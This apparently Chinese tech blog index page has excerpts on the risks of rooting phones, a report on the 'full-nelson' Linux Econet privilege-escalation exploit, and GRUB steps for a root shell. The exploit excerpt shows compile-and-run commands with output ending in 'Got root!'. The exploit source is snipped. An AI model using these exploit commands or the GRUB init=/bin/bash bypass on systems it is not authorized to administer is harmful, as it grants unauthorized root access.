网上超多的教程(甚至还有所谓的“一键ROOT”的方法),这些教程会让你惊奇的发现,获得ROOT好简单哦。理想状态下,每个用户做这个步骤之前都应该知道为什么要取得ROOT,更重要的是,如何在此之前保存他们手机中的信息。
但是,这不是一个理想的世界。我每天都看到新手一拿到手机就立刻刷ROOT,然后再问:取了ROOT有什么用?我们不能完全责怪用户,因为很多教程都没有强调刷ROOT可能导致的严重后果,会危及到你手上设备的安全性。
更矛盾的地方是,这些教程都假设读者已经有了一定技术水准,但往往这些教程却又归类到新手教程!我的观点是,很多用户根本不需要ROOT权限! Continue reading »
系统安全高手Dan Rosenberg 发布了一段 C 程序, 这段200多行的程序利用了 Linux Econet 协议的3个安全漏洞,可以导致本地帐号对系统进行拒绝服务或特权提升,也就是说一个普通用户可以通过运行这段程序后轻松获得 root shell,以下在 update 过的 Ubuntu 10.04 Server LTS 上测试通过:
$ sudo apt-get update
$ sudo apt-get upgrade
$ uname -r
2.6.32-21-server
$ gcc full-nelson.c -o full-nelson
$ ./full-nelson[*] Resolving kernel addresses…
[+] Resolved econet_ioctl to 0xffffffffa0131510
[+] Resolved econet_ops to 0xffffffffa0131600
[+] Resolved commit_creds to 0xffffffff8108b820
[+] Resolved prepare_kernel_cred to 0xffffffff8108bc00
[*] Calculating target…
[*] Failed to set Econet address.
[*] Triggering payload…
[*] Got root!#
由于 RHEL/CentOS 默认不支持 Econet 协议,所以测试没有通过:
# yum update
$ uname -r
2.6.18-194.26.1.el5
$ gcc full-nelson.c -o full-nelson
$ ./full-nelson
[*] Failed to open file descriptors.
如果在企业环境用 Ubuntu 的话可能会比较杯具了 Continue reading »
From: Dan Rosenberg
Date: Tue, 07 Dec 2010 15:25:36 -0500
Hi all,
I've included here a proof-of-concept local privilege escalation exploit
for Linux. Please read the header for an explanation of what's going
on. Without further ado, I present full-nelson.c:
Happy hacking,
Dan
–snip– Continue reading »
在这里,介绍一个在所有版本linux的grub上均可以使用的方法:
1、在Grub的引导装载程序菜单上,选择你要进入的条目,键入 “e” 来进入编辑模式;
2、在第二行(类似于kernel /vmlinuz-2.6.15 ro root=/dev/hda2 ),键入”e”进入编辑模式;
3、在句末加上”init=/bin/bash”,回车;
4、按“b”启动系统。
这样我们即可获得一个bash的shell,进入shell后, Continue reading »